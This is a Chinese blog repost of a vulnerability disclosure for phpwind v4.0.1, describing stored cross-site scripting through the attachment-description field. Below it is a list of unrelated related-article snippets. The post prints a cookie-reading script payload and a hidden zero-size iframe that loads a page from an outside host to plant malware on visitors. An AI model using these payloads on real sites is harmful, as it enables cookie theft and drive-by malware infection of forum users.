hpwind v4.0.1真正的跨站与挂马漏洞

最新推荐文章于 2025-04-27 20:16:18 发布
最新推荐文章于 2025-04-27 20:16:18 发布
阅读量832 收藏
点赞数
分类专栏: 安全 文章标签: 脚本 iframe 框架 测试 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/fcc_ecjtu/article/details/577670
版权
hpwind v4.0.1真正的跨站与挂马漏洞

漏洞程度:高危
漏洞程序:phpwind v4.0.1最新免费版
漏洞描述:利用phpwind v4.0.1论坛的发贴附件上传中的附件描述处插入任意代码!
漏洞利用:
  在phpwind v4.0.1发贴/回贴的附件上传处,有个附件描述,在此处插入脚本代码,比如插入:
以下是代码片段:
CODE:
<script>alert(document.cookie)</script>


  如图1:

 


  点击提交,发贴/回贴成功后,浏览该贴就会执行插入的代码,没有做过滤,此代码的作用是获取用户的COOKIE信息.看你怎么利用了,代码可以自己构造其它的,经测试,引号是被php过滤了的.结果如图2:


  从上图查看源文件可以看出,所插入的代码原样呆在附件描述处,没做过滤!
浏览刚发/回的贴子,结果如下图3:


  当然也可以插入框架脚本代码,即我们常说的挂马代码,如: 以下是代码片段:

CODE:
<iframe src=http://gingelly.xinwen365.com/index1.htm width=0 height=0>
                                                                                                         来自:www.hackbase.com
  

sql注入和跨站脚本攻击等
daiqinge的博客
04-15 8812
网站Web攻击,主要有:sql注入,css攻击,跨站脚本攻击,挂马,缓冲区溢出等。         1.  sql注入:即通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击        2. CSS攻击:
跨站挂马全攻略
Simael的专栏
10-18 707
跨站挂马全攻略    转载请注明版权:http://a1pass.blog.163.com/   A1Pass   《黑客X档案》  现在的黑客攻击手法中,跨站挂马似乎正在逐渐成为攻击的主流话题,鉴于这种形势,俺就把我学习跨站挂马的一点心得总结出来大家分享。 由于考虑到知识的认知过程以及入门朋友们的技术底子问题,本文将分为“基础知识”、“跨站漏洞挂马技巧”三部分组成,咱们先来学
无聊的Css跨站挂马
weixin_34409357的博客
07-21 99
以前看过分析家写过一篇文章,介绍跨站脚本的安全隐患,当时只是知道有这样的 问题,也没有仔细阅读,目前此类问题经常在一些安全站点发布,偶刚好看到这样一篇文章 , 抱着知道总比不知道好的想法,翻译整理了一下,原文在偶主页的collection目录里,错误 之处请 多多指点。 OK,go............ 什么是跨站脚本(CSS/XSS)? 我们所说跨站脚本是指在远...
xss跨站脚本攻击_CTF自学笔记(三)跨站脚本攻击之利用xss实现网页挂马
weixin_39905816的博客
12-12 1100
点击上方蓝字关注!注:本篇文章为个人学习笔记仅供学习交流。制作一个木马服务器攻击机:kalilinux IP:192.168.1.20靶机:Windows xp IP:192.168.1.15原理:利用MS14_064漏洞进行攻击。存在该漏洞的用户一旦通过浏览器访问木马服务器,就会缓冲区溢出,攻击者可以直接获取用户的系统Shell。步骤:(1)输入如下命令开启MetaSplo...
JAVA:URL存在跨站漏洞,注入漏洞解决方案
热门推荐
胡小晶的专栏
07-15 2万+
跨网站脚本介绍一 跨网站脚本跨网站脚本(Cross-site scripting,通常简称为XSS或跨站脚本跨站脚本攻击)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击...
PHP里主帖和回帖怎么关联,PHPwind v8.7发帖后设置默认签名好处和实现方法
weixin_31173113的博客
03-12 163
最近小编一直在研究自己php独立ip空间中的phpwind v8.7实现用户发帖后自动设置默认个性签名方法。也许对有些朋友来说这是个很正常没什么很大用处功能,其实你们的想法是错误的,在论坛中设置签名一旦用户发帖和回帖的时候你的签名就是你的广告,第二论坛中的签名如果可以做锚文本对SEO优化做外链作用非常大还可以提升网站爆光率,增加蜘蛛来访频率。虽然现在论坛签名链接已经不能为网站传递权重,但是论坛的签...
【lamp 】环境搭建以及应用之rpm
weixin_34419321的博客
08-25 99
【lamp 】环境搭建以及应用之rpmlamp中的:“L”指的是linux(操作系统)“A”指的是apache(web服务器)“M”指的是mysql(数据库)“P”指的是php(动态网站)即:【linux+apache+mysql+php】至于linux和apache想必大家应该都很熟悉,在此就不多介绍了,下面说一下mysql和php的历史,然后以两个实际例子来为大家展示rp...
mysql数据库调优
chen250727498的博客
07-10 2748
目录一、MySQL基础知识1.1 表结构(create table)1.2 常用的SQL操作二、问题SQL的定位2.1 全面日志查询2.2 慢SQL日志的生成、分析2.2.1 配置文件在my.cnf2.2.2 慢SQL分析2.3 进程列表查询2.4 SQL运行的步骤2.5 执行计划的查看2.5.1 SQL的执行计划2.5.2 explain 命令分解三、SQL并发问题3.1 锁3.2 事务3.3 并发引起的问题3.4 其它锁问题四、MYSQL基本分析命令五、索引5.1 索引的类型及作用5.2 索引的存储类型
LAMP平台-wordpress的搭建
weixin_33672109的博客
11-11 355
                        LAMP平台-wordpress的搭建                                               作者:尹正杰 版权声明:原创作品,谢绝转载!否则将追究法律责任。     Linux+Apache+Mysql/MariaDB+Perl/PHP/Python一组常用来搭建动态网站或者服务器的开源软件,本身都是各自独立的...
Spring_MVC 中的 JSON 数据处理 REST 风格开发
2301_77129242的博客
04-27 543
SpringMvc中json格式和REST风格开发
测试流程?
skjdnn的博客
04-25 375
测试流程?
车载测试用例开发-如何平衡用例覆盖度和测试效率的方法论
车载网络测试工程师的博客
04-20 1178
在进行车载测试用例编写时,会遇到多个条件导致用例排列组合爆炸的情况,但是为了产品测试质量,我们又不得不保证用例设计的需求覆盖度,这样又会使得测试周期非常长。我们如何平衡效率和测试质量?本文进行了一些思考。
测试用例的设计
m0_50460160的博客
04-26 265
有效(8位大小写以及数字组成,16位大小写字母以及数字组成,11位大小写以及数字组成)、无效(5位大小写以及数字组成,18位大小写以及数字组成,10位全大写字母、10位全小写字母、10位数字、为空)有效(未注册手机号)、无效(为空、已注册手机号、非11位数字、11为非数字)有效(已注册手机号、已注册邮箱)、无效(为空、未注册手机号、未注册邮箱)有效(正确且未过期)、无效(为空、错误验证码、正确但过期验证码)已注册手机号、已注册邮箱、为空、未注册手机号、未注册邮箱。有效(注册密码)、无效(为空、错误密码)
Playwright 入门教程:从概念到应用(Java 版)
苍煜
04-24 658
Playwright是由 Microsoft 开发的一个现代化的自动化测试工具,专为现代 Web 应用设计。它支持多种编程语言(如 Java、JavaScript/TypeScript、Python 和 C#),并提供对主流浏览器(Chromium、Firefox、WebKit)的原生支持。Playwright 不仅可以用于自动化测试,还可以用于抓取动态内容、调试和分析 Web 应用。
在面试中被问到spring是什么?
qq_62112907的博客
04-23 1455
数据访问、事务管理等模块化功能。它的优势在于简化开发、提升可维护性,并通过Spring Boot、Spring Cloud等子项目支持快速构建独立应用和微服务架构。,旨在简化Java应用的开发,提供全面的编程和配置模型。:Spring诞生于2003年,最初为解决EJB的复杂性,现已成为Java生态的事实标准。:将横切关注点(如日志、事务、权限)从业务逻辑中分离,通过动态代理实现代码复用。:统一数据访问层,支持JPA、MongoDB、Redis等。:快速构建独立、生产级应用,简化配置(约定优于配置)。
ShenNiusModularity项目源码学习(20:ShenNius.Admin.Mvc项目分析-5)
gc_2299的博客
04-23 441
学习并分析ShenNiusModularity项目中的租户管理页面
位操作之从右侧开始,设置整数 N 的二进制表示中的第 K 位
qq_56536309的博客
04-23 164
详细说明给定一个数字 N 和一个值 K。从右侧开始,设置数字 N 的二进制表示中的第 K 位。最低有效位(或最后一位)的位置是 0,倒数第二位的位置是 1,以此类推。一个二进制数由两个数字组成,即 01。在计算机术语中,数字 1 被称为置位。最坏情况下的时间复杂度:O (1)空间复杂度:O (1)
JMeter 安装及使用 [软件测试工具]
zjt_2002的博客
04-24 1147
本文主要介绍了: JMeter 的安装及详细使用教程 , 其中包括 JMeter 的安装, 基础配置, 基本使用流程, 原件作用域和执行顺序, 重要组件, 测试报告; 还有 path 环境配置详解
OpenFeign服务接口调用
m0_74808313的博客
04-27 621
在使用Spring Cloud开发微服务应用时,可使用RestTemplate+Ribbon的方式实现服务接口的远程调用。但这种方式需要填写远程地址,并配置相关参数,那么有没有更简单的方式呢?还可以使用OpenFeign来实现服务接口的远程调用。OpenFeign是一个声明式的HTTP客户端,可以在程序中像调用本地方法一样调用服务接口,并且支持负载均衡。
Java + Seleium4.X + TestNG自动化技术
最新发布
m0_58878709的博客
04-27 656
Selenium是最受欢迎的Web应用程序自动化测试工具之一。通过学习Selenium,可以编写自动化测试脚本,用于自动执行各种任务,例如验证功能、测试用户界面、模拟用户交互大大提高测试效率,减少手动测试的工作量Selenium自动化测试框架是一个用于Web应用程序测试的自动化测试工具支持多种浏览器(如Chrome、Firefox、Safari等)和操作系统(如Windows、Linux、macOS等),提供了一个丰富的API,允许用户模拟真实用户的交互行为,如点击、输入、提交等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值